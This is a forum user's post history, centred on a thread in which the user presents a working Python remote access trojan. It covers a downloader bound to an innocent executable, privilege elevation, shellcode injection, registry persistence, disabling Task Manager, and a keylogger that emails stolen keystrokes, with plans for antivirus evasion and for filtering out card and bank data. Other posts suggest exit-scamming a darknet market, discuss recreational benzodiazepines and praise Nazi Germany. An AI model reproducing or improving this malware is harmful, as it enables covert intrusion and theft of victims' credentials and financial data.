User Controls
Posts by Sophie
-
2015-08-29 at 8:58 PM UTC in fuck space jam
16/m/us, curly black hair and slim figure. Slowly stroking my keys to this thread atm.
kek/lol would kek again. -
2015-08-29 at 8:13 PM UTC in Sophie's Remote Access Trojan, Build 0.71 (Thoughts, ideas, comments & advice?)
My python knowledge is pretty rudimentary as I am still working on my programming knowledge and ability to be honest but from what I know I don't see why it would be problematic. If I think of anything I will certianly let you know.
Cool thanks.I suppose one thing I would think would add more pwnage would be a method of separating things like CC info, personal data and account data from the other aribitary keystrokes logged.
The easiest solution that i can think of for that, would probably be writing a program that scans for certain words or URLs in the dump of the keylogger data that we retrieve. Say a victim types in www.bankofamerica.com it is fair to assume that some personal information is to follow soon after.
There's a fun project, we could probably write a script for that.
Or there's probably a way in which we can grab keystrokes from forms and such but i imagine that would be pretty involved to pull off. -
2015-08-29 at 7:13 PM UTC in Is Runescape the most complex MMORPG?WoW was basically kill and gather when you were leveling up, but what was interesting was endgame character building with regards to dungeon and PVP specs/item sets and the like. Heroic dungeons/raids were good as well but everything became super simple weaksauce after Wrath of the Lich King.
-
2015-08-29 at 6:57 PM UTC in Benadryl is neuroprotective and antidepressiveThat's pretty interesting sploo, good find.
-
2015-08-29 at 6:51 PM UTC in The retarded thread: Fuck, §m£ÂgØL made one first edition
-
2015-08-29 at 6:50 PM UTC in I have bugs in my earsI hate bugs.
-
2015-08-29 at 6:44 PM UTC in I want to fucking DIE!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
You could get a little kitty-cat to play lazer with and feed it yum yums. *mew*
Sploo can't even take care of himself let a lone a little kitty-cat. -
2015-08-29 at 6:41 PM UTC in Sophie's Remote Access Trojan, Build 0.71 (Thoughts, ideas, comments & advice?)
-
2015-08-29 at 5:54 PM UTC in Sophie's Remote Access Trojan, Build 0.71 (Thoughts, ideas, comments & advice?)Ok so as some of you know i am working on improving gcat and i have come up with what i think is a working model including relevant code. Now i will give credit where credit is due and will mention that bytebleeder over at github is the one that did all the yeoman's work on this since he is the author of the actual main module which would include the implant and the controller. That being said however, the trojan wasn't really functional in a real life scenario since it did not offer anything in way of persistence or self preservation. So I set out to remedy this and after a lot of research this is what i came up with. I'll dissect the code as i work through it as this makes it easier for review.
The malware conists of the following.- Downloader
- Backdoor
The downloader will be bound to an innocent executable and is designed to download and run the backdoor file.
import os
import sys
import ctypes
import os.path
import _winreg
import win32com.shell.shell as shell
ASADMIN = 'asadmin'
if sys.argv[-1] != ASADMIN:
script = os.path.abspath(sys.argv[0])
params = ' '.join([script] + sys.argv[1:] + [ASADMIN])
shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
sys.exit(0)
I start off by importing the libs i need for the downloader and proceed to elevate the executables privilege, i read that by using ShellExecuteEx and then exiting at the end, the program will actually run the next lines of code as administrator without notifying the user. When i was testing it as script however i got a prompt that python.exe was requesting admin privilege(The interpreter not the script). I did not yet test when compiled but in case it still requests admin privilege i might as well define so with a flag when compiling with pyinstaller anyway, no need to use this 'trick' in that case.
After the program has recieved admin privilege it's going to check if we already downloaded the main module and if we haven't it's going to run shellcode that will do so and execute the main module.
PATH = 'C:\\Program Files\\Windows Defender\\secureserve.exe'
if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
break
else:
# Download file to path and execute (shellcode)
shellcode = bytearray(
"\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9"
"\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3"
"\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5"
"\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71"
"\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0"
"\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16"
"\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd"
"\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a"
"\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93"
"\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20"
"\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc"
"\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc"
"\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda"
"\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e"
"\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92"
"\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2"
"\x5e\xa4\xb4")
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
The shellcode provided here is actually an example. The proper shellcode will be generated by me using msfvenom but only if i can define the path that it's going to be downloaded to instead of the working directory(Haven't checked yet) i'll encode it with 'shikata ga nai' encoding to ensure we get no trouble from any anti-virus application. Failing that i will use the following script to generate custom shellcode.
http://pastebin.com/9GYU1kmL
This script is ready to use by the way and will ask you for a URL to the file you wish to download and to define a path to where it should be downloaded. It will put out an ASM(Asembly) file
which you can convert from the terminal using the following command:
objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Replace 'program' with the name of your ASM file. And it will output your shellcode.
Anyway, after the shellcode has executed the downloader will then add a registry key which will make it so the main module is loaded at boot. Here's the code for that:
# Registry key
PATH_TO_YOUR_EXECUTABLE = PATH
node = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run ', 0, _winreg.KEY_ALL_ACCESS)
_winreg.SetValueEx(node, 'foobar', 0, _winreg.REG_SZ, PATH_TO_YOUR_EXECUTABLE)
After that i want to have the downloader disable the task manager by changing the following registry value:
aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE)
SetValueEx(aKey,"DisableTaskMgr",1, REG_DWORD, 0)
CloseKey(aKey)
If all goes well, by this time the main module will be up and running and will have contacted my C&C, the code for the main module is basically the same as bytebleeder's original however i am pickling my keylogger data for data persistence as shown below.
https://github.com/byt3bl33d3r/gcat/...ter/implant.py
class KeyLogger(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.jobid = None
#self.key_buffer = ''
try:
f = open('key.log', 'rb')
self.key_buffer = pickle.load(f)
f.close()
except IOError:
self.key_buffer = ''
self.daemon = True
def run(self):
#logging.debug("[keylogger] started with jobid: {}".format(self.jobid))
t1 = threading.Thread(name='sendEmail', target=sendEmail, args=({'CMD': 'keylogger', 'RES': 'Keylogger started'}, self.jobid,))
t2 = threading.Thread(name='watchKeys', target=self.watchKeys)
for t in [t1, t2]:
t.setDaemon(True)
t.start()
while True:
hm = pyHook.HookManager()
hm.KeyDown = self.onKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
def stop(self):
#logging.debug("[keylogger] stopped with jobid: {}".format(self.jobid))
t = threading.Thread(name='sendEmail', target=sendEmail, args=({'CMD': 'keylogger', 'RES': 'Keylogger stopped'}, self.jobid,))
t.setDaemon(True)
t.start()
def watchKeys(self):
while True:
if len(self.key_buffer) >= 100:
keys = self.key_buffer
t = threading.Thread(name='sendEmail', target=sendEmail, args=({'CMD': 'keylogger', 'RES': r'{}'.format(keys)}, self.jobid,))
t.setDaemon(True)
t.start()
self.key_buffer = ''
time.sleep(0.5)
def onKeyboardEvent(self, event):
if event.Ascii != 0 or 8:
self.key_buffer += chr(event.Ascii)
if event.Ascii == 13:
self.key_buffer += chr(event.Ascii)
f = open('key.log', 'wb')
self.key_buffer = pickle.dump(self.key_buffer, f)
f.close()
Props to lanny for helping me out with pickling my keylogger data.
I'll be encoding the finished product once more with the python tool called PeCloak, for AV and Sandbox evasion.
http://seclist.us/pecloak-py-beta-a-...sion-tool.html
In any event, i'd like to hear your thoughts on this, how could i improve it even more? Make it better and more stealthy? Also, in the downloader i am checking to see if i already downloaded everything with an 'if' statement. In the else part i am basically running the rest of the program. Is there any problem with this i am not seeing? Also, is there a better solution to get privilege escalation other than what i used here?
Anyway, please let me know what you think. -
2015-08-29 at 11:26 AM UTC in So the weirdos over at /phile/ seem to think this game Splatoon is the shit...
The only 2 people who seem to post on that board are both severely autistic, so this isn't surprising.
Word, i never got the appeal of animu lolis over actual lolis anyway which /phile/ seems to be all over. -
2015-08-29 at 11:21 AM UTC in How many people with an interest in cyber security("Hacking") are still here?
with all these computer folks around here, you would think that we would form an alliance and start a darknet marketplace. maybe one selling stolen goods and car parts as re: my suggestion
Yeah, no sit back, shut up, and learn from those who know both of us or take your middle aged teenaged Midwest mindset back to bad ideas where you and the rest of the would be criminal master minds master bate each other's bait.
Eh truth be told it's not the worst idea. If you hold the bitcoin in escrow and run off with them before your market becomes too notorious you could stand to make a pretty profit. The trick would be securing your hidden service while you gather a small following and consequently the bitcoins. -
2015-08-29 at 11:05 AM UTC in How many people with an interest in cyber security("Hacking") are still here?
https://evilzone.org/
As if i don't already have an account there. Lulz. They're very knowledgeable and good shit in general, i like the people here better though. -
2015-08-29 at 12:53 AM UTC in Teach me Perl niggas
Thats where I started off. This one helped quite a bit as well:
http://qntm.org/files/perl/perl.html
Cool, anything specefic you're looking to write? -
2015-08-28 at 11:04 PM UTC in Teach me Perl niggasI have no experience with perl myself, but the official site seems informative enough.
http://learn.perl.org/
https://www.perl.org/books/beginning-perl/ -
2015-08-28 at 8:31 PM UTC in The retarded thread: Fuck, §m£ÂgØL made one first edition
is clonazolam recreational and/or worth ordering? better than etiz? better than fubromazolam, or worse?
I love k-pins personally. They last longer than etiz and are more fun in my experience. -
2015-08-28 at 8:26 PM UTC in How many people with an interest in cyber security("Hacking") are still here?
I would but I get instant shame because people 4 years younger than me are better at programming/hacking due to public school one of the best cyber security/computer science academies in the state/country and I got kicked out for never going to school
Never too late to learn though, i only really got into IT when i was older. There are loads of people better than me, that's just the way it is. -
2015-08-28 at 8:09 PM UTC in Why minimum wage is bad.
I didnt say anything bad about the third reich. I pointed out that they lost and because of that Italy got fucked. Italy was weaksauce during WWII BECAUSE Germany didnt have the resources to fight their own war plus Italys. If we wanna talk about Germany in WWII they were some strong motherfuckers. I mean the German people held the entire world at bay FOR SIX DAMN YEARS in what amounted to them vs nearly every world superpower. Talk about ballers son!
Also if Mussolini sent his troops to Russia they would have died anyway. Everybody knows its a fools errend to invade Russia. Nepolian couldnt do it, Hitler couldnt do it its just not feasable to attempt. If Hitler actually listened to his advisors and waited to invade Russia the outcome of that war would have been drastically changed. It was foolish to send that many troops and expend that many resources because all it did was kill troops and deplete resources resulting in less ability to fight the fronts that mattered.
Of course invading Russia was stupid. But in the days of italies invasion Germany had sent lots of troops there as well which would have been to good use elsewhere as well, so yeah, i'm a bit shitposting anyway. But Nazi Germany was pretty cool, mmk? -
2015-08-28 at 7:58 PM UTC in ATTN: Sophie
nah not really.. I'm straight, and if i was gay, id still probably think you're ugly and want nothing to do with you. post a pic and lets see "how gay i am" for you. But you wont because you're a big pussssaay
Dang Bill Krozby, have you been drinking you're being awfully salty tonight. Relax you can be my BFF too if you want. <3 -
2015-08-28 at 7:18 PM UTC in ATTN: Sophie
lol thelittlestnigga is kinda gay
You're just jelly.
-
2015-08-28 at 6:56 PM UTC in How many people with an interest in cyber security("Hacking") are still here?
I am hella interested in learning more but I probably wont be able to contribute too much till I get a good base on my shit. I still have a lot more programming/TCP/IP/NETSEC stuff to learn before I can really help out.
plz2BteachingmeNetSec!?!?!?!
Netsec as in actual network security or more loosely the reddit definition(Which is more infosec anyway)? Or with a focus on web app penetration testing, website hacking and stuff like that? I'll tell you straight up front, i have a working knowledge of networking and protocols but networking per say is not my strong suit. With regards to web app, i know the basics of SQLi, XSS and understand the principles behind remote file inclusion and local file inclusion and i could certainly point you in the direction of the various tools that can be used for these purposes and how to operate them semi-proficiently. Think Kali Linux, PentestBox and the like. Beyong that, i could probably teach you some metasploit, how to work several vulnerability scanners and how to use google dorks and some basic manual tests to see if a site is vulnerable to SQL injection and stuff like that.
Like i said tell me what you're looking for specifically and i'll try to provide you with the content you require. If i don't know something, and there's always a high chance of that, i will certainly know some resources that will be helpful in increasing both our understanding of the subject matter at hand. Indeed, collaborative learning is what would make this extra fun and interesting.